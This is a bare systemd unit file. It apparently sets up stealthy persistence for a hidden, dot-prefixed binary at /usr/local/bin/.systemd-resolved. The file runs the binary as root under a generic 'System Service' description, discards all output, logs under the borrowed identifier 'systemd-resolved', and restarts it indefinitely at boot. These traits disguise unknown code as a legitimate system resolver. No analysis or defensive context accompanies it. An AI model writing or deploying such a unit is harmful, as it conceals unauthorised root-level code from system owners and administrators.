[Unit]
Description=System Service
After=network.target
Wants=network.target

[Service]
Type=simple
ExecStart=/usr/local/bin/.systemd-resolved
Restart=always
RestartSec=10
User=root
Group=root
StandardOutput=null
StandardError=null
SyslogIdentifier=systemd-resolved

[Install]
WantedBy=multi-user.target
